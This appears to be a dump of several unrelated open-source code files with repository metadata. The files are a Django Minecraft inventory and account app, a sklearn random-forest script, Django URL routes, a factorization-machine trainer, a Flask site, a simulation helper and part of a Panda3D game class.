{'class': 'at2 at_6', 'name': 'Tripwire Hook'}, 'ID': '131'}, 'stone_hoe': {'0': {'class': 'at3 at_56', 'name': 'Stone Hoe'}, 'ID': '291'}, 'flower_pot': {'0': {'class': 'at5 at5_26', 'name': 'Flower Pot'}, 'ID': '390'}, 'light_weighted_pressure_plate': {'0': {'class': 'at2 at_22', 'name': 'Weighted Pressure Plate (Light)'}, 'ID': '147'}, 'melon_stem': {'0': {'class': 'at1 at_74', 'name': 'Melon Vine'}, 'ID': '105'}, 'glass_bottle': {'0': {'class': 'at4 at_84', 'name': 'Glass Bottle'}, 'ID': '374'}, 'painting': {'0': {'class': 'at3 at_86', 'name': 'Painting'}, 'ID': '321'}, 'bed': {'0': {'class': 'at4 at_39', 'name': 'Bed'}, 'ID': '355'}, 'cookie': {'0': {'class': 'at4 at_41', 'name': 'Cookie'}, 'ID': '357'}, 'speckled_melon': {'0': {'class': 'at4 at_92', 'name': 'Glistering Melon (Slice)'}, 'ID': '382'}, 'command_block_minecart': {'0': {'class': 'at5 at5_62', 'name': 'Minecart (Command Block)'}, 'ID': '422'}, 'filled_map': {'0': {'class': 'at4 at_42', 'name': 'Map'}, 'ID': '358'}, 'monster_egg': {'5': {'class': 'at1 at_69', 'name': 'Monster Egg (Chiseled Stone)'}, '2': {'class': 'at1 at_66', 'name': 'Monster Egg (Stone Brick)'}, '0': {'class': 'at0', 'name': 'Monster Egg (Stone)'}, '3': {'class': 'at1 at_67', 'name': 'Monster Egg (Mossy Stone Brick)'}, '4': {'class': 'at1 at_68', 'name': 'Monster Egg (Cracked Stone)'}, '1': {'class': 'at0 at_10', 'name': 'Monster Egg (Cobblestone)'}, 'ID': '97:5'}, 'blaze_powder': {'0': {'class': 'at4 at_87', 'name': 'Blaze Powder'}, 'ID': '377'}, 'lit_redstone_ore': {'0': {'class': 'at1 at_28', 'name': 'Redstone Ore (Glowing)'}, 'ID': '74'}, 'stone_stairs': {'0': {'class': 'at1 at_22', 'name': 'Cobblestone Stairs'}, 'ID': '67'}, 'sandstone_stairs': {'0': {'class': 'at2 at_3', 'name': 'Sandstone Stairs'}, 'ID': '128'}, 'leather_boots': {'0': {'class': 'at3 at_66', 'name': 'Leather Boots'}, 'ID': '301'}, 'diamond_helmet': {'0': {'class': 'at3 at_75', 'name': 'Diamond Helmet'}, 'ID': '310'}, 'diamond_leggings': {'0': {'class': 'at3 
at_77', 'name': 'Diamond Leggings'}, 'ID': '312'}, 'hardened_clay': {'0': {'class': 'at2 at_96', 'name': 'Hardened Clay'}, 'ID': '172'}, 'birch_stairs': {'0': {'class': 'at2 at_10', 'name': 'Wooden Stairs (Birch)'}, 'ID': '135'}, 'red_mushroom': {'0': {'class': 'at0 at_87', 'name': 'Red Mushroom'}, 'ID': '40'}, 'brick_block': {'0': {'class': 'at1 at_1', 'name': 'Brick'}, 'ID': '45'}, 'wooden_pickaxe': {'0': {'class': 'at3 at_35', 'name': 'Wooden Pickaxe'}, 'ID': '270'}, 'record_blocks': {'0': {'class': 'at5 at5_88', 'name': 'Music Disk (Blocks)'}, 'ID': '2258'}, 'bone': {'0': {'class': 'at4 at_36', 'name': 'Bone'}, 'ID': '352'}, 'log': {'5': {'class': 'at0 at_35', 'name': 'Wood (Oak 5)'}, '2': {'class': 'at0 at_32', 'name': 'Wood (Birch)'}, '0': {'class': 'at0 at_30', 'name': 'Wood (Oak)'}, '3': {'class': 'at0 at_33', 'name': 'Wood (Jungle)'}, '4': {'class': 'at0 at_34', 'name': 'Wood (Oak 4)'}, '1': {'class': 'at0 at_31', 'name': 'Wood (Spruce)'}, 'ID': '17:5'}, 'item_frame': {'0': {'class': 'at5 at5_25', 'name': 'Item Frame'}, 'ID': '389'}, 'cake': {'0': {'class': 'at4 at_38', 'name': 'Cake'}, 'ID': '354'}}
inv = user.inv_survival.split(";")
inv_datas = []
for data in inv:
data = data.split(',')
inv_data = item.get(data[0].lower())
if inv_data == None:
inv_datas.append({'name': data[0]})
continue
if inv_data.get(data[2]) == None:
inv_datas.append(inv_data['0'])
continue
inv_datas.append(inv_data[data[2]])
return render(request, 'user/view.html', {'username': username, 'inv_datas': inv_datas})
def create(request):
data = {}
if request.method == 'POST':
form = CreateForm(request.POST)
data['form'] = form
if form.is_valid():
if form.cleaned_data['password'] == form.cleaned_data['password_']:
salt = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(15))
pw = sha256(bytes(form.cleaned_data['password'], encoding="ascii")).hexdigest()
pw = sha256(bytes(pw+salt, encoding="ascii")).hexdigest()
pw = "$"+"SHA"+"$"+salt+"$"+pw
try:
acc = Account.objects.create(
username=form.cleaned_data['username'],
password=pw,
email=form.cleaned_data['email'],
)
data['msg'] = "Register success !"
except:
data['msg'] = "Error, username or email was used"
else:
data['username'] = form.data['username']
data['email'] = form.data['email']
return render(request, 'user/create.html', data) | [
"theballkyo@gmail.com"
] | theballkyo@gmail.com |
0b2848f9370c62928edbdd57d699b64764f320c8 | 155724583d851f5ac06c5f89705d0b34dda54390 | /analisys/random_forest_classifier.py | 24b22fd2ae48b4fa1c06a8558a87f02a0b2efa51 | [
"MIT"
] | permissive | chavdim/amazon_comments | 76e420207d45ca1fe19450cf8f11e6cc1f8df8e5 | 609beb66b0efa9c0d5fbc1def5f32a6c43afb15f | refs/heads/master | 2020-06-17T01:24:44.620743 | 2017-02-23T07:00:43 | 2017-02-23T07:00:43 | 75,053,294 | 0 | 2 | null | 2017-01-31T05:41:25 | 2016-11-29T07:05:17 | Python | UTF-8 | Python | false | false | 2,250 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 20 20:15:06 2016
@author: chavdar
"""
from sklearn.ensemble import RandomForestClassifier
from sklearn.cross_validation import train_test_split
from sklearn.preprocessing import normalize
import numpy as np
d = str(30)
with open('train_top'+d+'.csv', 'r',encoding='utf8') as f:
my_list = []
reader = csv.reader(f)
for row in reader:
my_list.append(row)
data = np.array(my_list)
data = data[1:,] # remove description
data = data.astype(np.float)
data = normalize(data, axis=0, norm='l2')
#norm age and rating
#data[0:,-2] = data[0:,-2] / data[0:,-2].max()
#data[0:,-1] = data[0:,-1] / data[0:,-1].max()
#data_word_age = data[0:,0:-1]
train_x = data[0:,0:-1]
train_y = np.array(data[0:,-1:]).reshape((data.shape[0], ))
##make ratings binary
train_rating_average = np.average(train_y)
binary_train_y = np.zeros([train_y.shape[0]])
iteration = 0
for i in train_y:
if i > train_rating_average:
binary_train_y[iteration] = 1.0
else:
binary_train_y[iteration] = 0.0
iteration += 1
##
X_train, X_test, y_train, y_test = train_test_split(train_x, binary_train_y, test_size=0.3, random_state=0)
cls = RandomForestClassifier()
cls.fit(X_train,y_train)
p=cls.predict(X_test)
s = cls.score(X_test,y_test)
print(s)
r = p - y_test
r = np.power(r,2)
print("wrong guesses: ",np.sum(r))
### on data not used for createing bag of words
with open('test_top'+d+'.csv', 'r',encoding='utf8') as f:
my_list = []
reader = csv.reader(f)
for row in reader:
my_list.append(row)
data_test = np.array(my_list)
data_test = data_test[1:,] # remove description
data_test = data_test.astype(np.float)
data_test = normalize(data_test, axis=0, norm='l2')
test_x = data_test[0:,0:-1]
test_y = np.array(data_test[0:,-1:]).reshape((data_test.shape[0], ))
##make ratings binary
train_rating_average = np.average(train_y)
binary_test_y = np.zeros([test_y.shape[0]])
iteration = 0
for i in test_y:
if i > train_rating_average:
binary_test_y[iteration] = 1.0
else:
binary_test_y[iteration] = 0.0
iteration += 1
s = cls.score(test_x,binary_test_y)
print("test on data not used for creating bag of words ")
print(s)
| [
"chavdardim90@gmail.com"
] | chavdardim90@gmail.com |
838017f0c58cc85bce1826841deadf7fbdddce44 | 7dd1e2319c9edfb43181b141dbabe9cc5688e6de | /todo_list/project/urls.py | dfef677e5d2ea779dc27e0c20390d3dbd53f07e2 | [] | no_license | hshlepak/todo_list | 29ad840f49ecb6b8133d8b230c35f3702ce95468 | fda91d35f9f09a9ce21f9115bc27127c417f60ac | refs/heads/master | 2022-11-26T06:37:51.377945 | 2018-11-23T12:54:52 | 2018-11-23T12:54:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,414 | py | from django.conf.urls import url
from django.contrib import admin
from project import views
from .views import TodayTasksView, NextDaysTasksView, ProjectTasksView, ArchiveView, \
AddTaskView, AddProjectView, DeleteTaskView
urlpatterns = [
url(r'^today/$', TodayTasksView.as_view(), name='today-tasks'),
url(r'^next_days/$', NextDaysTasksView.as_view(), name='next-days-tasks'),
url(r'^project_tasks/(?P<project_id>\d+)/$', ProjectTasksView.as_view(), name="project-tasks"),
url(r'^archive/$', ArchiveView, name="archive"),
url(r'^add_task/$', AddTaskView.as_view(), name='add-today-task'),
url(r'^add_project/$', AddProjectView.as_view(), name='add-project'),
url(r'^add_task/(?P<project_id>\d+)/$', AddTaskView.as_view(), name='add-project-task'),
url(r'^edit_task/(?P<slug>[\w-]+)/$', views.edit_task, name='edit-task'),
url(r'^edit_project/(?P<project_id>\d+)$', views.edit_project, name='edit-project'),
url(r'^delete_task/(?P<slug>[\w-]+)/$', DeleteTaskView.as_view(), name="delete-task"),
url(r'^delete_project/(?P<project_id>\d+)/$', views.delete_project, name="delete-project"),
url(r'^finish_task/(?P<slug>[\w-]+)/$', views.finish_task, name='finish-task'),
url(r'^profile/$', views.view_profile, name='profile'),
url(r'^profile/edit/$', views.edit_profile, name='edit-profile'),
url(r'^', TodayTasksView.as_view(), name='today-tasks'),
]
| [
"annashlepak@gmail.com"
] | annashlepak@gmail.com |
308f3a1b9d0fef144aca551c126510b5e4ebbb5c | 9f535db5cee5c861504789375744a02b6d00ff76 | /fm_proxpt.py | fee29e7d651b298e3c834529e8c9c0504aa76dbd | [
"BSD-2-Clause"
] | permissive | alexshtf/proxpt_fm | 96d5fe0c8e0073eaa56cec4b6515a912c96c8089 | 2b7a45d2f5fecdb83b74872c0a6a5b3af5ec5a04 | refs/heads/main | 2023-04-08T02:17:16.879663 | 2021-04-14T17:09:55 | 2021-04-14T17:09:55 | 357,981,107 | 0 | 0 | BSD-2-Clause | 2021-04-14T17:09:56 | 2021-04-14T17:02:53 | null | UTF-8 | Python | false | false | 2,802 | py | from golden_section import min_gss
import math
def neg_entr(z):
if z > 0:
return z * math.log(z)
else:
return 0
def loss_conjugate(z):
return neg_entr(z) + neg_entr(1 - z)
class ProxPtFMTrainer:
def __init__(self, fm, step_size):
# training parameters
self.b0 = fm.bias
self.bs = fm.biases
self.vs = fm.vs
self.step_size = step_size
# temporary state for a single learning step
self.nnz = None # number of nonzeros
self.bias_sum = None # sum of the biases corresponding to the nonzero indicators
self.vs_nz = None # embedding vectors of non-zero indicators, stacked as matrix rows
self.ones_times_vs_nnz = None # the matrix above multiplied by a matrix of ones.
def step(self, w_nz, y_hat):
self.nnz = w_nz.numel()
self.bias_sum = self.bs[w_nz].sum().item()
self.vs_nz = self.vs.weight[w_nz, :]
self.ones_times_vs_nnz = self.vs_nz.sum(dim=0, keepdim=True)
def q_neg(z): # neg. of the maximization objective - since the min_gss code minimizes functions.
return -(self.q_one(y_hat, z) + self.q_two(y_hat, z) - loss_conjugate(z))
opt_interval = min_gss(q_neg, 0, 1)
z_opt = sum(opt_interval) / 2
self.update_biases(w_nz, y_hat, z_opt)
self.update_vectors(w_nz, y_hat, z_opt)
def q_one(self, yhat, z):
return -0.5 * self.step_size * (1 + self.nnz) * (z ** 2) \
- yhat * (self.bias_sum + self.b0.item()) * z
def update_biases(self, w_nz, y_hat, z):
self.bs[w_nz] = self.bs[w_nz] + self.step_size * z * y_hat
self.b0.add_(self.step_size * z * y_hat)
def q_two(self, y_hat, z):
if z == 0:
return 0
# solve the linear system - find the optimal vectors
vs_opt = self.solve_s_inv_system(y_hat, z)
# compute q_2
pairwise = (vs_opt.sum(dim=0).square().sum() - vs_opt.square().sum()) / 2 # the pow-of-sum - sum-of-pow trick
diff_squared = (vs_opt - self.vs_nz).square().sum()
return (-z * y_hat * pairwise + diff_squared / (2 * self.step_size)).item()
def update_vectors(self, w_nz, yhat, z):
# if z = 0 --> we don't need to update the vectors.
if z == 0:
return
# update the vectors with the optimal ones
self.vs.weight[w_nz, :].sub_(self.vectors_update_dir(yhat, z))
def solve_s_inv_system(self, y_hat, z):
return self.vs_nz - self.vectors_update_dir(y_hat, z)
def vectors_update_dir(self, y_hat, z):
beta = self.step_size * y_hat * z
alpha = beta / (1 + beta)
return alpha * (self.vs_nz - self.ones_times_vs_nnz / (1 + beta * (1 - self.nnz)))
| [
"alex.shtoff@oath.com"
] | alex.shtoff@oath.com |
0775eeff28da04ac44eb9954ffe2d0417754463f | 3ab37c984a7a5bd1f190a7ba02c9f15840b9fa70 | /Test.py | 24716720705990e460c478fd16ae6479bc55a3c7 | [
"MIT"
] | permissive | junzhezhang/CommonModules | 1d4f6fea2e5ecf077ca28a909cedb7e740e6151d | 2411d47f8782539606187e2b30bc710021abceb0 | refs/heads/master | 2021-07-14T06:28:30.490683 | 2021-06-21T17:25:14 | 2021-06-21T17:25:14 | 172,190,655 | 0 | 0 | MIT | 2019-02-23T08:29:55 | 2019-02-23T08:29:55 | null | UTF-8 | Python | false | false | 637 | py | # -*- coding:utf-8 -*-
__author__ = "Wang Hewen"
import numpy as np
import CommonModules.DataStructureOperations
import CommonModules.IO
from CommonModules.Utilities import TimeElapsed
CM = CommonModules
logger = CM.Log.Initialize("test.log", WriteToStream = True)
def main():
logger.info("test info")
print(TimeElapsed())
test_array = np.array([[4,5,6]])
#test_array = np.array([])
print(CM.DataStructureOperations.CombineMatricesRowWise(test_array, np.array([[1,2,3]])))
#CM.IO.ExportNpArray("./test.txt", test_array)
print(TimeElapsed(LastTime = True))
return
if __name__ == "__main__":
main() | [
"wanghewen2@sina.com"
] | wanghewen2@sina.com |
b05980f3a55a6c7e642fdbcd2b31df57f6981ec7 | f098f26f882d30ec547e61c9c27c645c29f065e6 | /UserDev/RecoTool/ShowerReco3D/scripts/run_ShowerQuality_multishowers.py | c680a92bef72d2381aebd2f391fd44632a25dab7 | [] | no_license | wddgit/larlite | 59cfaa990c9df23c5645337c171933825339adfb | 8d159ff4259d88e66f769a2ad6df73eee994f306 | refs/heads/trunk | 2021-01-18T08:37:09.297897 | 2016-01-19T21:01:45 | 2016-01-19T21:01:45 | 42,332,618 | 0 | 0 | null | 2015-09-11T21:16:31 | 2015-09-11T21:16:30 | null | UTF-8 | Python | false | false | 1,043 | py | import sys
if len(sys.argv) < 2:
msg = '\n'
msg += "Usage 1: %s $INPUT_ROOT_FILE\n" % sys.argv[0]
msg += '\n'
sys.stderr.write(msg)
sys.exit(1)
from ROOT import larlite as fmwk
# Create ana_processor instance
my_proc = fmwk.ana_processor()
# Set input root files
for x in xrange(len(sys.argv)):
if x < 1:
continue
my_proc.add_input_file(sys.argv[x])
# Specify IO mode
my_proc.set_io_mode(fmwk.storage_manager.kREAD)
# Specify analysis output root file name
my_proc.set_ana_output_file("ShowerQuality_multishowers_ana_out.root");
# Specify data output root file name
my_proc.set_output_file('')
# Create analysis unit
sq_module = fmwk.ShowerQuality_multishowers()
#sq_module.setMCShowerQuality(True)
sq_module.SetShowerProducer("showerrecofuzzy")
#sq_module.SetShowerProducer("showermergeall")
sq_module.SetMaxEnergyCut(99999999.)
sq_module.SetMinEnergyCut(0.)
my_proc.add_process(sq_module)
print
print "Finished configuring ana_processor. Start event loop!"
print
my_proc.run()
sys.exit(0)
| [
"kaleko@nevis.columbia.edu"
] | kaleko@nevis.columbia.edu |
68602507ab106d19d4187d72e082b6ea487a2582 | ac6796175dcab9f1005eb5bf4147ee8291615ca4 | /command_tools.py | cbf3a0925806556c18b0f71474b287466f0bbb0f | [] | no_license | yhliao/util | 1c57c5e8cdadc9922a22992fcd517941fd27326d | ee3aeed328406bf920466b956931b11c61e176cc | refs/heads/master | 2022-12-07T05:42:46.282952 | 2020-08-26T23:21:54 | 2020-08-26T23:21:54 | 290,913,599 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,563 | py | from datetime import datetime
import os, time
import numpy as np
def log_and_run(runfunc,path,logfile):
if not logfile is None:
startt = datetime.now()
logfile.write("{0}: Job started for {1}\n"
.format(startt,path))
logfile.flush()
code = runfunc(path)
if not logfile is None:
now = datetime.now()
logfile.write("{0}: Job finished for {1}; exit status: {2}; time elapsed: {3}\n"
.format(now,path,code,now-startt))
logfile.flush()
def merge_list(filename_dict,keys):
filename_list = []
if keys is None:
for value in filename_dict.values():
filename_list += value
else:
for key in keys:
filename_list += filename_dict[key]
return filename_list
def commandrun(filename_dict,runfunc,logfile=None,keys=None):
filename_list = merge_list(filename_dict,keys)
for n, filename in enumerate(filename_list):
print ("({0})".format(n),filename)
command = input (">>> ")
if command in ["a","all"]:
for path in filename_list:
log_and_run(runfunc,path,logfile)
elif command=="" and len(filename_list)==1:
path = filename_list[0]
print ("Process the only file by default..")
log_and_run(runfunc,path,logfile)
else:
tokens = command.split('/')
index_str = [str(n) for n in range(len(filename_list))]
for token in tokens:
if token in index_str:
path = filename_list[int(token)]
log_and_run(runfunc,path,logfile)
def sort_mtime(inputlist):
ctimelist = []
mtimelist = []
for filepath in inputlist:
mtime = os.path.getmtime(filepath)
mtimelist.append(mtime)
ctimelist.append(time.ctime(mtime))
sorted_idx = np.argsort(ctimelist)
sorted_inputlist = [inputlist[i] for i in sorted_idx]
sorted_ctimelist = [ctimelist[i] for i in sorted_idx]
return sorted_inputlist, sorted_ctimelist
def command_listrun(filename_list, runfunc, descriptions=None ):
if descriptions is None:
descriptions = [""] * len(filename_list)
pad = max([len(path) for path in filename_list])
for n, (filepath, des) in enumerate(zip(filename_list,descriptions)):
print (n,':', filepath.ljust(pad), des)
command = input (">>> ")
tokens = command.split('/')
runpathlist = []
index_str = [str(n) for n in range(len(filename_list))]
for token in tokens:
if token in index_str:
runpathlist.append( filename_list[int(token)] )
if len(runpathlist) > 0:
runfunc (runpathlist)
| [
"yh_liao@berkeley.edu"
] | yh_liao@berkeley.edu |
cce0e27a550cf80d9004ca72625c9432b0d00e2c | a60fe6c89db97c07d0793be00552511750bf883b | /simulation/tcga/outcome_simulator.py | 1887841769ff5b8247572829e5ca0dc8d828a2e3 | [] | no_license | loucerac/GIN | 3f31c42f49b10b5fe10d4054b02384c937425ac8 | 0d2875bdfaa49dff37c0cfe6f930b8222def111d | refs/heads/main | 2023-06-14T18:41:25.587396 | 2021-07-09T14:31:46 | 2021-07-09T14:31:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,427 | py | from typing import Union
import numpy as np
from experiments.utils import sample_uniform_weights
from simulation.outcome_generators import OutcomeGenerator, generate_outcome_tcga
class TCGASimulator(OutcomeGenerator):
    """Outcome generator for the TCGA simulation.

    Delegates the response-surface computation to generate_outcome_tcga()
    and adds Gaussian noise via the OutcomeGenerator base class.  Three
    uniform weight vectors are sampled once at construction time and reused
    for every outcome, so repeated calls stay mutually consistent.
    """

    def __init__(
        self,
        id_to_graph_dict: dict,
        noise_mean: float = 0.0,
        noise_std: float = 1.0,
        dim_covariates: int = 25,
    ):
        super().__init__(
            id_to_graph_dict=id_to_graph_dict,
            noise_mean=noise_mean,
            noise_std=noise_std,
        )
        # Drawn once; shared across all simulated outcomes.
        self.covariates_weights = sample_uniform_weights(
            num_weights=3, dim_covariates=dim_covariates
        )

    def set_id_to_graph_dict(self, id_to_graph_dict: dict) -> None:
        """Swap in a new treatment-id -> graph mapping."""
        self.id_to_graph_dict = id_to_graph_dict

    def generate_outcomes_for_units(
        self, pca_features: list, unit_features: list, treatment_ids: list
    ) -> np.ndarray:
        """Simulate one outcome per (unit, treatment) pair; inputs are
        parallel sequences of equal length."""
        return self.__simulate(pca_features, unit_features, treatment_ids)

    def generate_outcomes_for_unit(
        self, pca_features, unit_features, treatment_ids
    ) -> np.ndarray:
        """Simulate outcomes for a single unit under each given treatment
        by tiling its features once per treatment id."""
        n_treatments = len(treatment_ids)
        tiled_pca = np.repeat(
            np.expand_dims(pca_features, axis=0), n_treatments, axis=0
        )
        tiled_unit = np.repeat(
            np.expand_dims(unit_features, axis=0), n_treatments, axis=0
        )
        return self.__simulate(tiled_pca, tiled_unit, treatment_ids)

    def __simulate(
        self,
        pca_features: Union[list, np.ndarray],
        unit_features: Union[list, np.ndarray],
        treatment_ids: list,
    ) -> np.ndarray:
        """Core loop: look up each treatment graph's 'prop', evaluate the
        TCGA outcome function, and perturb it with sampled noise."""
        outcomes = []
        for pca_row, unit_row, treatment_id in zip(
            pca_features, unit_features, treatment_ids
        ):
            prop = self.id_to_graph_dict[treatment_id]["prop"]
            signal = generate_outcome_tcga(
                unit_features=unit_row,
                pca_features=pca_row,
                prop=prop,
                random_weights=self.covariates_weights,
            )
            outcomes.append(signal + self._sample_noise())
        return np.array(outcomes).squeeze()
| [
"jean.kaddour.20@ucl.ac.uk"
] | jean.kaddour.20@ucl.ac.uk |
b613c5d06b07f98bd6b9ce329835ac582b56b3dc | 4be63cdef3ae05a18e56c46e95fa1aa6bfcbb790 | /PycharmProjects/test_pro/config/__init__.py | 06f7a6a83153cacc242c2dcebe137978fc33e95c | [] | no_license | xuxu001/music | cc683450edad7b4583349854092d10a9c83b93ba | 40c53bd06208e10f02edeab78061f145397e2f8d | refs/heads/master | 2020-07-05T16:19:59.019175 | 2019-08-16T09:17:25 | 2019-08-16T09:17:25 | 202,697,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 109 | py | #coding:utf-8
#__author__ =='xuxu'
import unit
import requests
from config.config import header, host, logger | [
"j18682948872@163.com"
] | j18682948872@163.com |
f05723369f6be025db307e9fe322e8f5ebd7775d | 10f51b68e0f98a761e68e4f3a72ca5f9723cc937 | /mysite/zad/urls.py | bd261eaa46949ff5dc6d2911422ed41ae52a48a3 | [] | no_license | CARLOS-AND-RABAB/zad | df88a06333f37b5fda86d2acf4bac30bc3b102f0 | 4e467231a42c70b7c778874eec5a3cb5c8bf493d | refs/heads/main | 2023-03-22T18:42:02.022050 | 2021-03-18T14:46:27 | 2021-03-18T14:46:27 | 345,817,968 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 589 | py | from django.urls import path
from . import views
from . import models
from django.conf.urls import url, include
from rest_framework import routers
app_name = 'zad'
urlpatterns = [
path('', views.home, name='home'),
path('AD_details/<int:pk>/', views.AD_details, name='AD_details'),
path('set_language/', views.set_language, name='set_language'),
path('Add_new_AD/', views.Add_new_AD, name='Add_new_AD'),
path('MyAd/', views.MyAd, name='MyAd'),
path('like_Ad/<int:pk>/',views.like_Ad,name='like_Ad'),
path('ContactUs/', views.ContactUs, name='ContactUs'),
]
| [
"rababkhalifamohammed@gmail.com"
] | rababkhalifamohammed@gmail.com |
588fd89ceb2c26f8185620167f76a654f48d4862 | 54bd004dd18f23b46fd75288823977a93d6c7c9d | /Python_basics/English_poet.py | 25376846330552643db0128f53300bf3acfbf400 | [] | no_license | Gagangithub1988/Python | 13f914a200f6f4750c1b7da1467ca7e3f48814d0 | 8c9ba1902ac45841fd3145d49b08547420f15f2d | refs/heads/master | 2022-11-03T22:12:51.799829 | 2020-06-20T06:46:45 | 2020-06-20T06:46:45 | 273,642,890 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | py | print('Twinkle, twinkle, little star,\n\tHow I wonder what you are! \n\t\tUp above the world so high, \n\t\tLike a diamond in the sky. \nTwinkle, twinkle, little star, \n\tHow I wonder what you are') | [
"noreply@github.com"
] | Gagangithub1988.noreply@github.com |
9606307b2b8bd4d785fa242550533de26b9bf7f8 | b57bce6b9668ebad5c26452469ad5faf79fee5bf | /tasashop/migrations/0009_entries.py | 1d002a3e23b81bbc7a6ec9a6a704b05a1d201a4f | [] | no_license | DelaCernaJal/TasaShop | c86e95674a0d7727894b4f501a6166b7b06060fb | 2dc077ab2650659a979dc3e415cc8f0bd288442f | refs/heads/main | 2023-06-12T21:24:01.177354 | 2021-06-28T04:01:38 | 2021-06-28T04:01:38 | 377,349,136 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | # Generated by Django 3.1.6 on 2021-06-23 10:10
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: creates the `Entries` model.

    Entries holds a price, an image field, and a nullable FK to `customer`
    that is set to NULL when the customer is deleted.
    """

    dependencies = [
        ('tasashop', '0008_auto_20210623_0440'),
    ]

    operations = [
        migrations.CreateModel(
            name='Entries',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('artPrice', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                # NOTE(review): field is named artName but declared as an
                # ImageField -- looks like a mixed-up name; confirm upstream.
                ('artName', models.ImageField(upload_to='')),
                ('customer', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='tasashop.customer')),
            ],
        ),
    ]
| [
"sharalyn.delacerna@gsfe.tupcavite.edu.ph"
] | sharalyn.delacerna@gsfe.tupcavite.edu.ph |
eeeb70c6908061359f8e8e66ec68d3f700d4b6b4 | 60d5a52944420c148baa3652fa921fda915e82a8 | /app.py | a28a782c944373aa83d3b95440fc2c8af7642753 | [] | no_license | morenoalex87/alm2301-final | 7da62f026935e08f4c0c7fce85262aa7a1c17f1b | 90c073b4fa1e97afbbf5c86bce4cdf32b3b6428f | refs/heads/master | 2022-06-30T16:51:39.517895 | 2020-05-15T19:12:57 | 2020-05-15T19:12:57 | 264,263,371 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 489 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 21 14:57:17 2020
@author: etill
"""
# Minimal Flask site: three static pages rendered from templates/.
from flask import Flask, render_template
# Flask application object (module name doubles as the app name).
app = Flask(__name__)
@app.route("/")
def hello():
    """Render the landing page."""
    return render_template("index.html")
@app.route("/classes")
def classes():
    """Render the classes page."""
    return render_template("classes.html")
@app.route("/clubs")
def clubs():
    """Render the clubs page."""
    return render_template("clubs.html")
# Start the development server when executed directly (not when imported).
if __name__ == "__main__":
    app.run()
"m.alex028@yahoo.com"
] | m.alex028@yahoo.com |
a8777de0fff2f753f2a10440eda5dc07631663cd | a63d907ad63ba6705420a6fb2788196d1bd3763c | /src/api/dataflow/stream/handlers/dataflow_yaml_execute_log.py | ec10a68c37c3a15e1547efc90d0f256f3089bb28 | [
"MIT"
] | permissive | Tencent/bk-base | a38461072811667dc2880a13a5232004fe771a4b | 6d483b4df67739b26cc8ecaa56c1d76ab46bd7a2 | refs/heads/master | 2022-07-30T04:24:53.370661 | 2022-04-02T10:30:55 | 2022-04-02T10:30:55 | 381,257,882 | 101 | 51 | NOASSERTION | 2022-04-02T10:30:56 | 2021-06-29T06:10:01 | Python | UTF-8 | Python | false | false | 1,629 | py | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from dataflow.stream.models import DataFlowYamlExecuteLog
def get(task_id):
    # Fetch a single yaml-execution record by primary key; propagates
    # DataFlowYamlExecuteLog.DoesNotExist when the id is unknown.
    return DataFlowYamlExecuteLog.objects.get(id=task_id)
def create(**kwargs):
    # Insert a new yaml-execution record; kwargs are passed straight through
    # to the Django model manager and must match its field names.
    return DataFlowYamlExecuteLog.objects.create(**kwargs)
| [
"terrencehan@tencent.com"
] | terrencehan@tencent.com |
695ede74ca316de3c91389ae6171cbaad557c2b8 | e1f0a05bb3b43d9234c6e4f1e9de52d6f1510699 | /Packages/anw/gui/system.py | 0ee3ee3f2dbc883841880b082ced07afd3c01367 | [] | no_license | colshag/play-cosmica | 5c9454e318045b292f539e7c4aae76782f403396 | 64af9b5c4e6c255fe43894cb3490428417043927 | refs/heads/master | 2020-04-25T12:54:15.641821 | 2019-04-08T01:47:17 | 2019-04-08T01:47:17 | 172,792,193 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,923 | py | # ---------------------------------------------------------------------------
# Cosmica - All rights reserved by NeuroJump Trademark 2018
# system.py
# Written by Chris Lewis
# ---------------------------------------------------------------------------
# The system represents one System object in map mode
# ---------------------------------------------------------------------------
from panda3d.core import Vec3
import direct.directbase.DirectStart
from anw.gui import textonscreen, rootsim
from anw.func import globals, funcs
class System(rootsim.RootSim):
    """A System Gui for interacting with player Solar Systems in map mode.

    Renders one solar system as a rotating sphere plus flat icon planes:
    the owning empire's crest and city counter, resource markers, and one
    small icon per industry type on the system.  Every icon plane is
    appended to self.myWidgets (provided by RootSim) so it can be removed
    together with the rest of the widgets.

    Refactor note: the twenty near-identical createSimXX methods now share
